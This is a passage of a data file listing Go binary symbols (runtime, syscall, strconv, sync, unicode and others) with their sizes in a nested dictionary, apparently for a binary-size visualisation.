'stackcacherelease': {'value': 285}, 'stackcheck': {'value': 31}, 'stackfree': {'value': 796}, 'stackinit': {'value': 91}, 'stacklog2': {'value': 27}, 'stackpool': {'value': 64}, 'stackpoolalloc': {'value': 469}, 'stackpoolfree': {'value': 391}, 'stackpoolmu': {'value': 8}, 'startNano': {'value': 8}, 'startTemplateThread': {'value': 106}, 'startTheWorld': {'value': 141}, 'startTheWorld.': {'children': {'func1': {'value': 55}}}, 'startTheWorldWithSema': {'value': 599}, 'startlockedm': {'value': 214}, 'startm': {'value': 546}, 'startpanic_m': {'value': 460}, 'starttime': {'value': 8}, 'startupRandomData': {'value': 24}, 'staticbytes': {'value': 256}, 'statictmp_1': {'value': 16}, 'statictmp_10': {'value': 16}, 'statictmp_11': {'value': 16}, 'statictmp_12': {'value': 16}, 'statictmp_15': {'value': 16}, 'statictmp_16': {'value': 16}, 'statictmp_17': {'value': 8}, 'statictmp_19': {'value': 8}, 'statictmp_2': {'value': 16}, 'statictmp_20': {'value': 16}, 'statictmp_25': {'value': 16}, 'statictmp_28': {'value': 16}, 'statictmp_29': {'value': 16}, 'statictmp_3': {'value': 16}, 'statictmp_32': {'value': 16}, 'statictmp_33': {'value': 16}, 'statictmp_35': {'value': 64}, 'statictmp_36': {'value': 64}, 'statictmp_37': {'value': 64}, 'statictmp_38': {'value': 64}, 'statictmp_39': {'value': 64}, 'statictmp_4': {'value': 16}, 'statictmp_40': {'value': 64}, 'statictmp_43': {'value': 16}, 'statictmp_47': {'value': 8}, 'statictmp_5': {'value': 16}, 'statictmp_50': {'value': 64}, 'statictmp_51': {'value': 64}, 'statictmp_52': {'value': 16}, 'statictmp_53': {'value': 16}, 'statictmp_54': {'value': 16}, 'statictmp_55': {'value': 16}, 'statictmp_56': {'value': 16}, 'statictmp_57': {'value': 16}, 'statictmp_58': {'value': 360}, 'statictmp_7': {'value': 96}, 'statictmp_8': {'value': 96}, 'statictmp_9': {'value': 144}, 'stealOrder': {'value': 32}, 'step': {'value': 425}, 'stkbucket': {'value': 834}, 'stopTheWorld': {'value': 146}, 'stopTheWorldWithSema': {'value': 708}, 'stoplockedm': {'value': 691}, 'stopm': {'value': 410}, 'strequal': {'value': 107}, 'strhash': {'value': 92}, 'stringtoslicebyte': {'value': 220}, 'stringtoslicerune': {'value': 403}, 'support_erms': {'value': 1}, 'support_popcnt': {'value': 1}, 'support_sse2': {'value': 1}, 'support_sse41': {'value': 1}, 'sweep': {'value': 32}, 'sweepone': {'value': 918}, 'syncadjustsudogs': {'value': 334}, 'sysAlloc': {'value': 272}, 'sysFault': {'value': 95}, 'sysFree': {'value': 72}, 'sysMap': {'value': 211}, 'sysMmap': {'value': 80}, 'sysMunmap': {'value': 39}, 'sysReserve': {'value': 135}, 'sysReserveAligned': {'value': 309}, 'sysSigaction': {'value': 110}, 'sysSigaction.': {'children': {'func1': {'value': 63}}}, 'sysUnused': {'value': 379}, 'sysUsed': {'value': 114}, 'sysargs': {'value': 629}, 'sysauxv': {'value': 272}, 'sysmon': {'value': 1258}, 'systemstack': {'value': 163}, 'systemstack_switch': {'value': 1}, 'templateThread': {'value': 277}, 'testAtomic64': {'value': 604}, 'testSigtrap': {'value': 8}, 'test_x64': {'value': 8}, 'test_z64': {'value': 8}, 'testdefersizes': {'value': 585}, 'textsectionmap': {'value': 24}, 'throw': {'value': 133}, 'throw.': {'children': {'func1': {'value': 128}}}, 'throwinit': {'value': 63}, 'timediv': {'value': 101}, 'timejump': {'value': 205}, 'timejumpLocked': {'value': 159}, 'timers': {'value': 8192}, 'trace': {'value': 65744}, 'traceAcquireBuffer': {'value': 174}, 'traceEvent': {'value': 247}, 'traceEventLocked': {'value': 674}, 'traceFlush': {'value': 473}, 'traceGCDone': {'value': 81}, 'traceGCMarkAssistDone': {'value': 81}, 'traceGCMarkAssistStart': {'value': 81}, 'traceGCSTWDone': {'value': 81}, 'traceGCSTWStart': {'value': 111}, 'traceGCStart': {'value': 120}, 'traceGCSweepDone': {'value': 221}, 'traceGCSweepSpan': {'value': 163}, 'traceGCSweepStart': {'value': 124}, 'traceGoCreate': {'value': 247}, 'traceGoEnd': {'value': 81}, 'traceGoPark': {'value': 139}, 'traceGoPreempt': {'value': 108}, 'traceGoSched': {'value': 108}, 'traceGoStart': {'value': 410}, 'traceGoSysBlock': {'value': 219}, 'traceGoSysCall': {'value': 81}, 'traceGoSysExit': {'value': 218}, 'traceGoUnpark': {'value': 253}, 'traceGomaxprocs': {'value': 113}, 'traceHeapAlloc': {'value': 113}, 'traceNextGC': {'value': 190}, 'traceProcFree': {'value': 181}, 'traceProcStart': {'value': 126}, 'traceProcStop': {'value': 219}, 'traceReader': {'value': 238}, 'traceReleaseBuffer': {'value': 128}, 'traceStackID': {'value': 325}, 'tracealloc': {'value': 635}, 'tracealloc.': {'children': {'func1': {'value': 86}}}, 'traceback': {'value': 99}, 'traceback1': {'value': 852}, 'tracebackCgoContext': {'value': 605}, 'tracebackHexdump': {'value': 490}, 'tracebackHexdump.': {'children': {'func1': {'value': 60}}}, 'traceback_cache': {'value': 4}, 'traceback_env': {'value': 4}, 'tracebackdefers': {'value': 551}, 'tracebackothers': {'value': 598}, 'tracebacktrap': {'value': 183}, 'tracefree': {'value': 337}, 'tracefree.': {'children': {'func1': {'value': 86}}}, 'tracegc': {'value': 225}, 'tracelock': {'value': 8}, 'trygetfull': {'value': 111}, 'typeBitsBulkBarrier': {'value': 727}, 'typedmemclr': {'value': 98}, 'typedmemmove': {'value': 196}, 'typedslicecopy': {'value': 320}, 'typelink': {'value': 2920}, 'typelinksinit': {'value': 1743}, 'typesEqual': {'value': 4025}, 'typestring': {'value': 80}, 'unblocksig': {'value': 119}, 'unlock': {'value': 200}, 'unlockOSThread': {'value': 140}, 'unminit': {'value': 6}, 'unminitSignals': {'value': 153}, 'urandom_dev': {'value': 24}, 'useAVXmemmove': {'value': 1}, 'useAeshash': {'value': 1}, 'useCheckmark': {'value': 1}, 'usleep': {'value': 71}, 'vdsoClockgettimeSym': {'value': 8}, 'vdsoFindVersion': {'value': 279}, 'vdsoGettimeofdaySym': {'value': 8}, 'vdsoInitFromSysinfoEhdr': {'value': 1120}, 'vdsoLinuxVersion': {'value': 24}, 'vdsoParseSymbols': {'value': 951}, 'vdsoParseSymbols.': {'children': {'func1': {'value': 329}}}, 'vdsoSymbolKeys': {'value': 24}, 'vdsoauxv': {'value': 214}, 'waitReason.': {'children': {'String': {'value': 107}}}, 'waitReasonStrings': {'value': 384}, 'wakefing': {'value': 149}, 'wakep': {'value': 99}, 'walltime': {'value': 178}, 'wbBufFlush': {'value': 216}, 'wbBufFlush.': {'children': {'func1': {'value': 75}}}, 'wbBufFlush1': {'value': 640}, 'work': {'value': 424}, 'worldsema': {'value': 4}, 'write': {'value': 39}, 'writeBarrier': {'value': 16}, 'writeErr': {'value': 90}, 'xbuckets': {'value': 8}, 'zeroVal': {'value': 1024}, 'zerobase': {'value': 8}}}, 'syscall.': {'children': {'go.itab.Errno,error': {'value': 32}, '(*Errno).': {'children': {'Error': {'value': 119}}}, 'BytePtrFromString': {'value': 161}, 'ByteSliceFromString': {'value': 287}, 'Close': {'value': 209}, 'Errno.': {'children': {'Error': {'value': 206}}}, 'Readlink': {'value': 151}, 'SetNonblock': {'value': 201}, 'Stderr': {'value': 8}, 'Stdin': {'value': 8}, 'Stdout': {'value': 8}, 'Syscall': {'value': 113}, 'Syscall.': {'children': {'args_stackmap': {'value': 12}}}, 'Syscall6': {'value': 107}, 'Syscall6.': {'children': {'args_stackmap': {'value': 14}}}, 'Write': {'value': 120}, '_zero': {'value': 8}, 'envs': {'value': 24}, 'errEAGAIN': {'value': 16}, 'errEINVAL': {'value': 16}, 'errENOENT': {'value': 16}, 'errors': {'value': 2128}, 'fcntl': {'value': 245}, 'init': {'value': 212}, 'initdone.': {'value': 1}, 'itoa': {'value': 188}, 'mmap': {'value': 293}, 'munmap': {'value': 220}, 'readlinkat': {'value': 432}, 'runtime_envs': {'value': 269}, 'statictmp_24': {'value': 8}, 'statictmp_50': {'value': 8}, 'statictmp_51': {'value': 8}, 'statictmp_52': {'value': 8}, 'statictmp_53': {'value': 32}, 'uitoa': {'value': 239}, 'write': {'value': 277}}}, 'io.': {'children': {'EOF': {'value': 16}, 'ErrClosedPipe': {'value': 16}, 'ErrNoProgress': {'value': 16}, 'ErrShortBuffer': {'value': 16}, 'ErrShortWrite': {'value': 16}, 'ErrUnexpectedEOF': {'value': 16}, 'errOffset': {'value': 16}, 'errWhence': {'value': 16}, 'init': {'value': 738}, 'initdone.': {'value': 1}}}, 'main.': {'children': {'init': {'value': 92}, 'initdone.': {'value': 1}, 'main': {'value': 170}, 'statictmp_0': {'value': 16}, 'x': {'value': 80000}}}, 'math.': {'children': {'init': {'value': 116}, 'initdone.': {'value': 1}, 'useFMA': {'value': 1}}}, 'runtime/': {'children': {'debug.': {'children': {'SetTraceback': {'value': 443}, 'setGCPercent': {'value': 203}}}, 'internal/': {'children': {'atomic.': {'children': {'Cas64': {'value': 26}, 'Casuintptr': {'value': 5}, 'Store': {'value': 12}, 'Store64': {'value': 14}, 'Storeuintptr': {'value': 5}}}, 'sys.': {'children': {'DefaultGoroot': {'value': 16}, 'DefaultGoroot.': {'children': {'str': {'value': 17}}}, 'ntz8tab': {'value': 256}}}}}}}, 'strconv.': {'children': {'(*decimal).': {'children': {'Assign': {'value': 246}, 'Round': {'value': 200}, 'RoundDown': {'value': 99}, 'RoundUp': {'value': 139}, 'Shift': {'value': 203}, 'String': {'value': 1103}}}, '(*extFloat).': {'children': {'AssignComputeBounds': {'value': 272}, 'FixedDecimal': {'value': 946}, 'Multiply': {'value': 123}, 'ShortestDecimal': {'value': 1328}, 'frexp10': {'value': 269}}}, 'AppendFloat': {'value': 176}, 'AppendQuote': {'value': 158}, 'AppendQuoteRune': {'value': 133}, 'AppendQuoteRuneToASCII': {'value': 133}, 'AppendQuoteToASCII': {'value': 158}, 'CanBackquote': {'value': 252}, 'ErrRange': {'value': 16}, 'ErrSyntax': {'value': 16}, 'FormatInt': {'value': 281}, 'IsPrint': {'value': 809}, 'Itoa': {'value': 89}, 'adjustLastDigit': {'value': 242}, 'adjustLastDigitFixed': {'value': 354}, 'appendEscapedRune': {'value': 3172}, 'appendQuotedRuneWith': {'value': 370}, 'appendQuotedWith': {'value': 1071}, 'bigFtoa': {'value': 1013}, 'bsearch16': {'value': 124}, 'bsearch32': {'value': 121}, 'digitZero': {'value': 32}, 'float32info': {'value': 24}, 'float64info': {'value': 24}, 'fmtB': {'value': 570}, 'fmtE': {'value': 1745}, 'fmtF': {'value': 1071}, 'formatBits': {'value': 1326}, 'formatDigits': {'value': 1043}, 'frexp10Many': {'value': 239}, 'genericFtoa': {'value': 2227}, 'init': {'value': 252}, 'initdone.': {'value': 1}, 'isGraphic': {'value': 24}, 'isInGraphicList': {'value': 179}, 'isNotPrint16': {'value': 24}, 'isNotPrint32': {'value': 24}, 'isPrint16': {'value': 24}, 'isPrint32': {'value': 24}, 'leftShift': {'value': 564}, 'leftcheats': {'value': 24}, 'optimize': {'value': 1}, 'powersOfTen': {'value': 2088}, 'prefixIsLessThan': {'value': 69}, 'rightShift': {'value': 445}, 'roundShortest': {'value': 933}, 'statictmp_1': {'value': 16}, 'statictmp_10': {'value': 1464}, 'statictmp_11': {'value': 912}, 'statictmp_12': {'value': 280}, 'statictmp_13': {'value': 1584}, 'statictmp_14': {'value': 172}, 'statictmp_15': {'value': 32}, 'statictmp_2': {'value': 16}, 'statictmp_3': {'value': 16}, 'statictmp_4': {'value': 16}, 'statictmp_5': {'value': 16}, 'statictmp_6': {'value': 16}, 'trim': {'value': 93}, 'uint64pow10': {'value': 160}}}, 'sync.': {'children': {'(*Map).': {'children': {'Load': {'value': 774}, 'LoadOrStore': {'value': 1498}, 'Store': {'value': 1325}, 'dirtyLocked': {'value': 557}, 'missLocked': {'value': 249}}}, '(*Mutex).': {'children': {'Lock': {'value': 715}, 'Unlock': {'value': 217}}}, '(*Once).': {'children': {'Do': {'value': 239}}}, '(*Pool).': {'children': {'Get': {'value': 352}, 'Put': {'value': 420}, 'getSlow': {'value': 313}, 'pin': {'value': 113}, 'pinSlow': {'value': 568}}}, '(*entry).': {'children': {'storeLocked': {'value': 72}, 'tryExpungeLocked': {'value': 148}, 'tryLoadOrStore': {'value': 402}, 'tryStore': {'value': 170}, 'unexpungeLocked': {'value': 92}}}, 'allPools': {'value': 24}, 'allPoolsMu': {'value': 8}, 'event': {'value': 212}, 'expunged': {'value': 8}, 'init': {'value': 163}, 'init.': {'children': {'0': {'value': 62}, '1': {'value': 59}}}, 'initdone.': {'value': 1}, 'poolCleanup': {'value': 552}, 'runtime_SemacquireMutex': {'value': 78}, 'runtime_Semrelease': {'value': 69}, 'runtime_canSpin': {'value': 140}, 'runtime_doSpin': {'value': 36}, 'runtime_nanotime': {'value': 60}, 'runtime_notifyListCheck': {'value': 183}, 'runtime_procPin': {'value': 36}, 'runtime_procUnpin': {'value': 21}, 'runtime_registerPoolCleanup': {'value': 83}, 'throw': {'value': 62}}}, 'sync/': {'children': {'atomic.': {'children': {'(*Value).': {'children': {'Store': {'value': 310}}}, 'CompareAndSwapPointer': {'value': 115}, 'CompareAndSwapUintptr': {'value': 5}, 'CompareAndSwapUintptr.': {'children': {'args_stackmap': {'value': 10}}}, 'StorePointer': {'value': 91}, 'StoreUint32': {'value': 5}, 'StoreUint32.': {'children': {'args_stackmap': {'value': 9}}}, 'StoreUintptr': {'value': 5}, 'StoreUintptr.': {'children': {'args_stackmap': {'value': 9}}}, 'runtime_procPin': {'value': 36}, 'runtime_procUnpin': {'value': 21}, 'statictmp_1': {'value': 16}, 'statictmp_2': {'value': 16}}}}}, 'time.': {'children': {'atoiError': {'value': 16}, 'badData': {'value': 16}, 'errBad': {'value': 16}, 'errLeadingInt': {'value': 16}, 'errLocation': {'value': 16}, 'init': {'value': 1158}, 'initdone.': {'value': 1}, 'now': {'value': 107}, 'statictmp_19': {'value': 64}, 'unitMap': {'value': 8}}}, 'unicode.': {'children': {'ASCII_Hex_Digit': {'value': 8}, 'Adlam': {'value': 8}, 'Ahom': {'value': 8}, 'Anatolian_Hieroglyphs': {'value': 8}, 'Arabic': {'value': 8}, 'Armenian': {'value': 8}, 'Avestan': {'value': 8}, 'Balinese': {'value': 8}, 'Bamum': {'value': 8}, 'Bassa_Vah': {'value': 8}, 'Batak': {'value': 8}, 'Bengali': {'value': 8}, 'Bhaiksuki': {'value': 8}, 'Bidi_Control': {'value': 8}, 'Bopomofo': {'value': 8}, 'Brahmi': {'value': 8}, 'Braille': {'value': 8}, 'Buginese': {'value': 8}, 'Buhid': {'value': 8}, 'C': {'value': 8}, 'Canadian_Aboriginal': {'value': 8}, 'Carian': {'value': 8}, 'Categories': {'value': 8}, 'Caucasian_Albanian': {'value': 8}, 'Cc': {'value': 8}, 'Cf': {'value': 8}, 'Chakma': {'value': 8}, 'Cham': {'value': 8}, 'Cherokee': {'value': 8}, 'Co': {'value': 8}, 'Common': {'value': 8}, 'Coptic': {'value': 8}, 'Cs': {'value': 8}, 'Cuneiform': {'value': 8}, 'Cypriot': {'value': 8}, 'Cyrillic': {'value': 8}, 'Dash': {'value': 8}, 'Deprecated': {'value': 8}, 'Deseret': {'value': 8}, 'Devanagari': {'value': 8}, 'Diacritic': {'value': 8}, 'Duployan': {'value': 8}, 'Egyptian_Hieroglyphs': {'value': 8}, 'Elbasan': {'value': 8}, 'Ethiopic': {'value': 8}, 'Extender': {'value': 8}, 'FoldCategory': {'value': 8}, 'FoldScript': {'value': 8}, 'Georgian': {'value': 8}, 'Glagolitic': {'value': 8}, 'Gothic': {'value': 8}, 'Grantha': {'value': 8}, 'Greek': {'value': 8}, 'Gujarati': {'value': 8}, 'Gurmukhi': {'value': 8}, 'Han': {'value': 8}, 'Hangul': {'value': 8}, 'Hanunoo': {'value': 8}, 'Hatran': {'value': 8}, 'Hebrew': {'value': 8}, 'Hex_Digit': {'value': 8}, 'Hiragana': {'value': 8}, 'Hyphen': {'value': 8}, 'IDS_Binary_Operator': {'value': 8}, 'IDS_Trinary_Operator': {'value': 8}, 'Ideographic': {'value': 8}, 'Imperial_Aramaic': {'value': 8}, 'Inherited': {'value': 8}, 'Inscriptional_Pahlavi': {'value': 8}, 'Inscriptional_Parthian': {'value': 8}, 'Javanese': {'value': 8}, 'Join_Control': {'value': 8}, 'Kaithi': {'value': 8}, 'Kannada': {'value': 8}, 'Katakana': {'value': 8}, 'Kayah_Li': {'value': 8}, 'Kharoshthi': {'value': 8}, 'Khmer': {'value': 8}, 'Khojki': {'value': 8}, 'Khudawadi': {'value': 8}, 'L': {'value': 8}, 'Lao': {'value': 8}, 'Latin': {'value': 8}, 'Lepcha': {'value': 8}, 'Limbu': {'value': 8}, 'Linear_A': {'value': 8}, 'Linear_B': {'value': 8}, 'Lisu': {'value': 8}, 'Ll': {'value': 8}, 'Lm': {'value': 8}, 'Lo': {'value': 8}, 'Logical_Order_Exception': {'value': 8}, 'Lt': {'value': 8}, 'Lu': {'value': 8}, 'Lycian': {'value': 8}, 'Lydian': {'value': 8}, 'M': {'value': 8}, 'Mahajani': {'value': 8}, 'Malayalam': {'value': 8}, 'Mandaic': {'value': 8}, 'Manichaean': {'value': 8}, 'Marchen': {'value': 8}, 'Masaram_Gondi': {'value': 8}, 'Mc': {'value': 8}, 'Me': {'value': 8}, 'Meetei_Mayek': {'value': 8}, 'Mende_Kikakui': {'value': 8}, 'Meroitic_Cursive': {'value': 8}, 'Meroitic_Hieroglyphs': {'value': 8}, 'Miao': {'value': 8}, 'Mn': {'value': 8}, 'Modi': {'value': 8}, 'Mongolian': {'value': 8}, 'Mro': {'value': 8}, 'Multani': {'value': 8}, 'Myanmar': {'value': 8}, 'N': {'value': 8}, 'Nabataean': {'value': 8}, 'Nd': {'value': 8}, 'New_Tai_Lue': {'value': 8}, 'Newa': {'value': 8}, 'Nko': {'value': 8}, 'Nl': {'value': 8}, 'No': {'value': 8}, 'Noncharacter_Code_Point': {'value': 8}, 'Nushu': {'value': 8}, 'Ogham': {'value': 8}, 'Ol_Chiki': {'value': 8}, 'Old_Hungarian': {'value': 8}, 'Old_Italic': {'value': 8}, 'Old_North_Arabian': {'value': 8}, 'Old_Permic': {'value': 8}, 'Old_Persian': {'value': 8}, 'Old_South_Arabian': {'value': 8}, 'Old_Turkic': {'value': 8}, 'Oriya': {'value': 8}, 'Osage': {'value': 8}, 'Osmanya': {'value': 8}, 'Other_Alphabetic': {'value': 8}, 'Other_Default_Ignorable_Code_Point': {'value': 8}, 'Other_Grapheme_Extend': {'value': 8}, 'Other_ID_Continue': {'value': 8}, 'Other_ID_Start': {'value': 8}, 'Other_Lowercase': {'value': 8}, 'Other_Math': {'value': 8}, 'Other_Uppercase': {'value': 8}, 'P': {'value': 8}, 'Pahawh_Hmong': {'value': 8}, 'Palmyrene': {'value': 8}, 'Pattern_Syntax': {'value': 8}, 'Pattern_White_Space': {'value': 8}, 'Pau_Cin_Hau': {'value': 8}, 'Pc': {'value': 8}, 'Pd': {'value': 8}, 'Pe': {'value': 8}, 'Pf': {'value': 8}, 'Phags_Pa': {'value': 8}, 'Phoenician': {'value': 8}, 'Pi': {'value': 8}, 'Po': {'value': 8}, 'Prepended_Concatenation_Mark': {'value': 8}, 'Properties': {'value': 8}, 'Ps': {'value': 8}, 'Psalter_Pahlavi': {'value': 8}, 'Quotation_Mark': {'value': 8}, 'Radical': {'value': 8}, 'Regional_Indicator': {'value': 8}, 'Rejang': {'value': 8}, 'Runic': {'value': 8}, 'S': {'value': 8}, 'Samaritan': {'value': 8}, 'Saurashtra': {'value': 8}, 'Sc': {'value': 8}, 'Scripts': {'value': 8}, 'Sentence_Terminal': {'value': 8}, 'Sharada': {'value': 8}, 'Shavian': {'value': 8}, 'Siddham': {'value': 8}, 'SignWriting': {'value': 8}, 'Sinhala': {'value': 8}, 'Sk': {'value': 8}, 'Sm': {'value': 8}, 'So': {'value': 8}, 'Soft_Dotted': {'value': 8}, 'Sora_Sompeng': {'value': 8}, 'Soyombo': {'value': 8}, 'Sundanese': {'value': 8}, 'Syloti_Nagri': {'value': 8}, 'Syriac': {'value': 8}, 'Tagalog': {'value': 8}, 'Tagbanwa': {'value': 8}, 'Tai_Le': {'value': 8}, 'Tai_Tham': {'value': 8}, 'Tai_Viet': {'value': 8}, 'Takri': {'value': 8}, 'Tamil': {'value': 8}, 'Tangut': {'value': 8}, 'Telugu': {'value': 8}, 'Terminal_Punctuation': {'value': 8}, 'Thaana': {'value': 8}, 'Thai': {'value': 8}, 'Tibetan': {'value': 8}, 'Tifinagh': {'value': 8}, 'Tirhuta': {'value': 8}, 'Ugaritic': {'value': 8}, 'Unified_Ideograph': {'value': 8}, 'Vai': {'value': 8}, 'Variation_Selector': {'value': 8}, 'Warang_Citi': {'value': 8}, 'White_Space': {'value': 8}, 'Yi': {'value': 8}, 'Z': {'value': 8}, 'Zanabazar_Square': {'value': 8}, 'Zl': {'value': 8}, 'Zp': {'value': 8}, 'Zs': {'value': 8}, 'foldCommon': {'value': 8}, 'foldGreek': {'value': 8}, 'foldInherited': {'value': 8}, 'foldL': {'value': 8}, 'foldLl': {'value': 8}, 'foldLt': {'value': 8}, 'foldLu': {'value': 8}, 'foldM': {'value': 8}, 'foldMn': {'value': 8}, 'init': {'value': 22912}, 'initdone.': {'value': 1}, 'statictmp_1': {'value': 56}, 'statictmp_10': {'value': 56}, 'statictmp_101': {'value': 36}, 'statictmp_102': {'value': 56}, 'statictmp_104': {'value': 12}, 'statictmp_105': {'value': 56}, 'statictmp_106': {'value': 132}, 'statictmp_107': {'value': 420}, 'statictmp_108': {'value': 56}, 'statictmp_109': {'value': 36}, 'statictmp_11': {'value': 672}, 'statictmp_110': {'value': 56}, 'statictmp_112': {'value': 24}, 'statictmp_113': {'value': 56}, 'statictmp_114': {'value': 12}, 'statictmp_115': {'value': 56}, 'statictmp_116': {'value': 6}, 'statictmp_117': {'value': 12}, 'statictmp_118': {'value': 56}, 'statictmp_12': {'value': 456}, 'statictmp_120': {'value': 24}, 'statictmp_121': {'value': 56}, 'statictmp_122': {'value': 12}, 'statictmp_123': {'value': 56}, 'statictmp_124': {'value': 84}, 'statictmp_125': {'value': 56}, 'statictmp_127': {'value': 48}, 'statictmp_128': {'value': 56}, 'statictmp_129': {'value': 18}, 'statictmp_13': {'value': 56}, 'statictmp_130': {'value': 56}, 'statictmp_132': {'value': 36}, 'statictmp_133': {'value': 56}, 'statictmp_134': {'value': 6}, 'statictmp_135': {'value': 56}, 'statictmp_136': {'value': 12}, 'statictmp_137': {'value': 56}, 'statictmp_138': {'value': 6}, 'statictmp_139': {'value': 56}, 'statictmp_14': {'value': 756}, 'statictmp_140': {'value': 12}, 'statictmp_141': {'value': 56}, 'statictmp_143': {'value': 12}, 'statictmp_144': {'value': 56}, 'statictmp_146': {'value': 24}, 'statictmp_147': {'value': 56}, 'statictmp_149': {'value': 24}, 'statictmp_15': {'value': 744}, 'statictmp_150': {'value': 56}, 'statictmp_151': {'value': 24}, 'statictmp_152': {'value': 56}, 'statictmp_153': {'value': 18}, 'statictmp_154': {'value': 56}, 'statictmp_155': {'value': 552}, 'statictmp_156': {'value': 864}, 'statictmp_157': {'value': 56}, 'statictmp_158': {'value': 18}, 'statictmp_159': {'value': 56}, 'statictmp_16': {'value': 56}, 'statictmp_161': {'value': 48}, 'statictmp_162': {'value': 56}, 'statictmp_164': {'value': 72}, 'statictmp_165': {'value': 56}, 'statictmp_166': {'value': 48}, 'statictmp_167': {'value': 56}, 'statictmp_169': {'value': 12}, 'statictmp_17': {'value': 30}, 'statictmp_170': {'value': 56}, 'statictmp_171': {'value': 24}, 'statictmp_172': {'value': 56}, 'statictmp_174': {'value': 60}, 'statictmp_175': {'value': 56}, 'statictmp_177': {'value': 12}, 'statictmp_178': {'value': 56}, 'statictmp_180': {'value': 12}, 'statictmp_181': {'value': 56}, 'statictmp_182': {'value': 192}, 'statictmp_183': {'value': 56}, 'statictmp_184': {'value': 48}, 'statictmp_185': {'value': 56}, 'statictmp_186': {'value': 12}, 'statictmp_187': {'value': 60}, 'statictmp_188': {'value': 56}, 'statictmp_190': {'value': 12}, 'statictmp_191': {'value': 56}, 'statictmp_193': {'value': 180}, 'statictmp_194': {'value': 56}, 'statictmp_195': {'value': 198}, 'statictmp_196': {'value': 36}, 'statictmp_197': {'value': 56}, 'statictmp_198': {'value': 84}, 'statictmp_199': {'value': 56}, 'statictmp_2': {'value': 2154}, 'statictmp_20': {'value': 56}, 'statictmp_200': {'value': 96}, 'statictmp_201': {'value': 56}, 'statictmp_202': {'value': 66}, 'statictmp_203': {'value': 72}, 'statictmp_204': {'value': 56}, 'statictmp_205': {'value': 84}, 'statictmp_206': {'value': 56}, 'statictmp_207': {'value': 6}, 'statictmp_208': {'value': 56}, 'statictmp_21': {'value': 84}, 'statictmp_210': {'value': 36}, 'statictmp_211': {'value': 56}, 'statictmp_212': {'value': 54}, 'statictmp_213': {'value': 56}, 'statictmp_214': {'value': 12}, 'statictmp_215': {'value': 24}, 'statictmp_216': {'value': 56}, 'statictmp_218': {'value': 24}, 'statictmp_219': {'value': 56}, 'statictmp_22': {'value': 84}, 'statictmp_220': {'value': 120}, 'statictmp_221': {'value': 84}, 'statictmp_222': {'value': 56}, 'statictmp_224': {'value': 24}, 'statictmp_225': {'value': 56}, 'statictmp_227': {'value': 24}, 'statictmp_228': {'value': 56}, 'statictmp_229': {'value': 18}, 'statictmp_23': {'value': 56}, 'statictmp_230': {'value': 56}, 'statictmp_232': {'value': 12}, 'statictmp_233': {'value': 56}, 'statictmp_234': {'value': 84}, 'statictmp_235': {'value': 56}, 'statictmp_236': {'value': 42}, 'statictmp_237': {'value': 12}, 'statictmp_238': {'value': 56}, 'statictmp_239': {'value': 12}, 'statictmp_24': {'value': 12}, 'statictmp_240': {'value': 56}, 'statictmp_242': {'value': 96}, 'statictmp_243': {'value': 56}, 'statictmp_244': {'value': 24}, 'statictmp_245': {'value': 56}, 'statictmp_247': {'value': 24}, 'statictmp_248': {'value': 56}, 'statictmp_25': {'value': 56}, 'statictmp_250': {'value': 24}, 'statictmp_251': {'value': 56}, 'statictmp_252': {'value': 108}, 'statictmp_253': {'value': 56}, 'statictmp_254': {'value': 186}, 'statictmp_255': {'value': 56}, 'statictmp_256': {'value': 18}, 'statictmp_257': {'value': 56}, 'statictmp_258': {'value': 30}, 'statictmp_259': {'value': 56}, 'statictmp_26': {'value': 66}, 'statictmp_261': {'value': 36}, 'statictmp_262': {'value': 56}, 'statictmp_264': {'value': 84}, 'statictmp_265': {'value': 56}, 'statictmp_266': {'value': 6}, 'statictmp_267': {'value': 56}, 'statictmp_269': {'value': 12}, 'statictmp_27': {'value': 60}, 'statictmp_270': {'value': 56}, 'statictmp_272': {'value': 24}, 'statictmp_273': {'value': 56}, 'statictmp_275': {'value': 12}, 'statictmp_276': {'value': 56}, 'statictmp_277': {'value': 48}, 'statictmp_278': {'value': 56}, 'statictmp_279': {'value': 12}, 'statictmp_28': {'value': 56}, 'statictmp_280': {'value': 56}, 'statictmp_282': {'value': 24}, 'statictmp_283': {'value': 56}, 'statictmp_285': {'value': 36}, 'statictmp_286': {'value': 56}, 'statictmp_288': {'value': 84}, 'statictmp_289': {'value': 56}, 'statictmp_29': {'value': 6}, 'statictmp_290': {'value': 18}, 'statictmp_291': {'value': 56}, 'statictmp_293': {'value': 24}, 'statictmp_294': {'value': 56}, 'statictmp_296': {'value': 36}, 'statictmp_297': {'value': 56}, 'statictmp_299': {'value': 12}, 'statictmp_3': {'value': 2268}, 'statictmp_30': {'value': 24}, 'statictmp_300': {'value': 56}, 'statictmp_302': {'value': 36}, 'statictmp_303': {'value': 56}, 'statictmp_305': {'value': 24}, 'statictmp_306': {'value': 56}, 'statictmp_307': {'value': 36}, 'statictmp_308': {'value': 12}, 'statictmp_309': {'value': 56}, 'statictmp_31': {'value': 56}, 'statictmp_311': {'value': 36}, 'statictmp_312': {'value': 56}, 'statictmp_314': {'value': 60}, 'statictmp_315': {'value': 56}, 'statictmp_316': {'value': 18}, 'statictmp_317': {'value': 56}, 'statictmp_319': {'value': 24}, 'statictmp_32': {'value': 6}, 'statictmp_320': {'value': 56}, 'statictmp_321': {'value': 24}, 'statictmp_322': {'value': 56}, 'statictmp_324': {'value': 36}, 'statictmp_325': {'value': 56}, 'statictmp_326': {'value': 6}, 'statictmp_327': {'value': 56}, 'statictmp_329': {'value': 24}, 'statictmp_33': {'value': 56}, 'statictmp_330': {'value': 56}, 'statictmp_331': {'value': 6}, 'statictmp_332': {'value': 56}, 'statictmp_333': {'value': 6}, 'statictmp_334': {'value': 56}, 'statictmp_336': {'value': 36}, 'statictmp_337': {'value': 56}, 'statictmp_339': {'value': 24}, 'statictmp_34': {'value': 702}, 'statictmp_340': {'value': 56}, 'statictmp_342': {'value': 12}, 'statictmp_343': {'value': 56}, 'statictmp_345': {'value': 12}, 'statictmp_346': {'value': 56}, 'statictmp_348': {'value': 24}, 'statictmp_349': {'value': 56}, 'statictmp_35': {'value': 396}, 'statictmp_351': {'value': 12}, 'statictmp_352': {'value': 56}, 'statictmp_354': {'value': 12}, 'statictmp_355': {'value': 56}, 'statictmp_356': {'value': 84}, 'statictmp_357': {'value': 56}, 'statictmp_359': {'value': 24}, 'statictmp_36': {'value': 56}, 'statictmp_360': {'value': 56}, 'statictmp_362': {'value': 24}, 'statictmp_363': {'value': 56}, 'statictmp_365': {'value': 60}, 'statictmp_366': {'value': 56}, 'statictmp_368': {'value': 12}, 'statictmp_369': {'value': 56}, 'statictmp_37': {'value': 240}, 'statictmp_371': {'value': 12}, 